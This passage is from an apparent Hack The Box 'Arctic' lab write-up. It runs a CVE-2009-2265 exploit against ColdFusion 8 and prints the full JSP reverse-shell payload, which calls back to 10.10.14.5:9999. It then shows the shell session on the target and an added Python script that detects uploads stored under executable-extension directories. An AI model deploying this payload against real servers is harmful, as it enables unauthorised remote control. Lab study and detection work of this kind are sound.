Remote Code Execution
Executing the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/arctic]
└─$ python3 CVE-2009-2265.py
Generating a payload...
payload size: 1496 bytes
saved as: 0b13a7f6a7324d4aaaba2c57e8b27d54.jsp
Priting request...
content-type: multipart/form-data; boundary=546972aa32b84c5a855381abdd07782b
content-length: 1697
--546972aa32b84c5a855381abdd07782b
content-disposition: form-data; name="newfile"; filename="0b13a7f6a7324d4aaaba2c57e8b27d54.txt"
content-type: text/plain
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream pq;
OutputStream aq;
StreamConnector( InputStream pq, OutputStream aq )
{
this.pq = pq;
this.aq = aq;
}
public void run()
{
BufferedReader fW = null;
BufferedWriter k_w = null;
try
{
fW = new BufferedReader( new InputStreamReader( this.pq ) );
k_w = new BufferedWriter( new OutputStreamWriter( this.aq ) );
char buffer[] = new char[8192];
int length;
while( ( length = fW.read( buffer, 0, buffer.length ) ) > 0 )
{
k_w.write( buffer, 0, length );
k_w.flush();
}
} catch( Exception e ){}
try
{
if( fW != null )
fW.close();
if( k_w != null )
k_w.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "10.10.14.5", 9999 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
--546972aa32b84c5a855381abdd07782b--
Sending request and printing response...
<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/0b13a7f6a7324d4aaaba2c57e8b27d54.jsp/0b13a7f6a7324d4aaaba2c57e8b27d54.txt", "0b13a7f6a7324d4aaaba2c57e8b27d54.txt", "0" );
</script>
Printing some information for debugging...
lhost: 10.10.14.5
lport: 9999
rhost: 10.10.10.11
rport: 8500
payload: 0b13a7f6a7324d4aaaba2c57e8b27d54.jsp
Deleting the payload...
Listening for connection...
Executing the payload...
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.11] 49350
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\ColdFusion8\runtime\bin> whoami
whoami
arctic\tolis
c:\ColdFusion8\runtime\bin> hostname
hostname
arctic
c:\ColdFusion8\runtime\bin> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.11
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{79f1b374-ac3c-416c-8812-bf482d048a22}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
tunnel adapter local area connection* 9:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
Initial foothold established as tolis by exploiting CVE-2009-2265 on the target web application.
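The upload response above shows the trick at the heart of CVE-2009-2265: the uploaded file is a harmless-looking .txt, but it is stored under a directory named *.jsp, so the application server hands it to the JSP engine. The following detection script is an added example, not part of the original write-up or the exploit; it inspects an upload callback and Common Log Format access-log lines for paths whose directory components carry an executable extension. The sample callback and log lines are constructed here, modelled on the session above.

```python
import re
from urllib.parse import unquote

# Extensions the ColdFusion/JRun front end treats as executable. The flaw
# above puts one of them on a *directory*, not on the uploaded file itself.
EXEC_EXTS = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")

# Constructed samples (not from the page): the callback the exploit received
# and access-log lines modelled on the resulting path plus two benign requests.
SAMPLE_CALLBACK = ('window.parent.OnUploadCompleted( 0, "/userfiles/file/'
                   '0b13a7f6a7324d4aaaba2c57e8b27d54.jsp/0b13a7f6a7324d4aaaba2c57e8b27d54.txt",'
                   ' "0b13a7f6a7324d4aaaba2c57e8b27d54.txt", "0" );')
SAMPLE_LOG = """\
10.10.14.5 - - [10/Jan/2020:12:00:01 +0000] "GET /userfiles/file/0b13a7f6a7324d4aaaba2c57e8b27d54.jsp/0b13a7f6a7324d4aaaba2c57e8b27d54.txt HTTP/1.1" 200 0
10.10.14.9 - - [10/Jan/2020:12:00:02 +0000] "GET /userfiles/file/report.txt HTTP/1.1" 200 1024
10.10.14.9 - - [10/Jan/2020:12:00:03 +0000] "GET /index.cfm HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)')
CALLBACK_RE = re.compile(r'OnUploadCompleted\(\s*\d+\s*,\s*"([^"]*)"')


def executable_dir_components(path):
    """Every path component except the last that ends in an executable extension."""
    decoded = unquote(path.split("?", 1)[0]).lower()   # strip query, decode, normalise case
    parts = [p for p in decoded.split("/") if p]
    return [p for p in parts[:-1] if p.endswith(EXEC_EXTS)]


def check_upload_callback(body):
    """Return the stored path from an OnUploadCompleted body if it sits under an
    executable-extension directory, else None."""
    m = CALLBACK_RE.search(body)
    if m and executable_dir_components(m.group(1)):
        return m.group(1)
    return None


def scan_log(text):
    """Return (client_ip, path, offending_components) for each flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits = executable_dir_components(m["path"])
            if hits:
                findings.append((m["ip"], m["path"], hits))
    return findings
```

Running the same check against the userfiles directory on disk (any subdirectory named *.jsp or *.cfm) catches uploads that never show up in the access log.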